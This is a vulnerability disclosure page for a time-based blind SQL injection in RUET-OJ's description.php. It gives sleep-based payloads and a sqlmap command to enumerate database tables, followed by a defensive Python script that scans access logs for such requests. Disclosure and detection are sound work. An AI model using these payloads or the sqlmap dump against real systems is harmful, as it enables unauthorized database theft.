| Title | shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection |
|---|
| Description | There is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the description.php file, allowing an attacker to dump the entire database. You need to be authenticated in the application.
[POC]
Use Burp proxy to verify the vulnerability.
GET description.php, passing the payload in the id parameter.
GET /description.php?id=id=55'+and+sleep(5)%23
To check the current database size, for example: id=55'+and+if(length(database())+=+3,sleep(5),0)%23
Automate with sqlmap:
sqlmap -u http://<IP>/description.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| User | ManinhuGuitar (UID 84672) |
|---|
| Submission | 13/10/2025 11:23 PM (6 months ago) |
|---|
| Moderation | 27/10/2025 11:22 AM (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 330104 [shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /description.php id SQL injection] |
|---|
| अंक | 17 |
|---|
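
For defenders running this application, the requests described in the submission leave a recognizable trace in web server access logs: the `id` parameter of `description.php` stops being a plain integer and carries a delay call. The following is an added example, not part of the submission or of the RUET-OJ project; the combined log format, the sample lines and the `benchmark()` pattern are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Oct/2025:23:01:10 +0000] "GET /description.php?id=55 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Oct/2025:23:02:41 +0000] "GET /description.php?id=55'+and+sleep(5)%23 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Oct/2025:23:02:58 +0000] "GET /description.php?id=55'+and+if(length(database())+=+3,sleep(5),0)%23 HTTP/1.1" 200 5120
203.0.113.7 - - [13/Oct/2025:23:03:05 +0000] "GET /index.php?page=sleep HTTP/1.1" 200 900
198.51.100.4 - - [13/Oct/2025:23:04:12 +0000] "GET /description.php?id=55%27 HTTP/1.1" 500 310
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# MySQL delay primitives: sleep() appears in the report, benchmark() is added here.
DELAY_CALL = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)
NUMERIC = re.compile(r'[0-9]+')

def classify(value):
    """Return 'ok', 'time-based' or 'non-numeric' for a decoded id value."""
    if NUMERIC.fullmatch(value):
        return "ok"
    if DELAY_CALL.search(value):
        return "time-based"
    return "non-numeric"

def scan(log_text, path="/description.php", param="id"):
    """Return (client_ip, verdict, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param:
                verdict = classify(value)
                if verdict != "ok":
                    findings.append((m.group("ip"), verdict, value))
    return findings

if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value!r}")
```

Because the parameter is expected to be an integer, every non-numeric value is reported; the `time-based` verdict only raises priority for requests that also contain a delay call.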